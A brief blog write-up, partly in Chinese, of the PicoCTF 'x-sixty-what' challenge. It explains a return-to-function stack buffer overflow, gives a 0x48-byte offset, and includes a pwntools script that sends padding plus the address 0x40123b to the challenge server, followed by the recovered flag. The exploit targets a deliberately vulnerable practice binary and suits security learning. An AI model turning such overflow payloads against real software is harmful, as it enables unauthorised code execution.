PicoCTF - x-sixty-what

Posted on | Post modified | In |

PicoCTF - x-sixty-what

Source code

:::spoiler

:::

Recon

這一題有點奇怪,沒有想像中簡單,看起來就是一個簡單的return 2 function的問題,但是看了objdump的flag function原本應該是0x401236,但是會友segmentation fault,看了其他的WP1,發現應該return到0x40123b,不太知道為甚麼

  • 第一張是return 2 0x401236

  • 第二張是return 2 0x40123b

Exploit

  1. 用動態的方式看offset \(0x7fffffffd758 - 0x00007fffffffd710 = 0x48\) ```python= from pwn import *

r = remote(‘saturn.picoctf.net’, 58166)

r = process(‘./vuln’)

context.arch = ‘amd64’

raw_input() print(r.recvline().strip().decode())

payload = b’a’*0x48 + p64(0x40123b) print(payload) r.sendline(payload)

r.interactive() ```

Flag: picoCTF{b1663r_15_b3773r_e79d5a75}

Reference

  1. x-sixty-what WP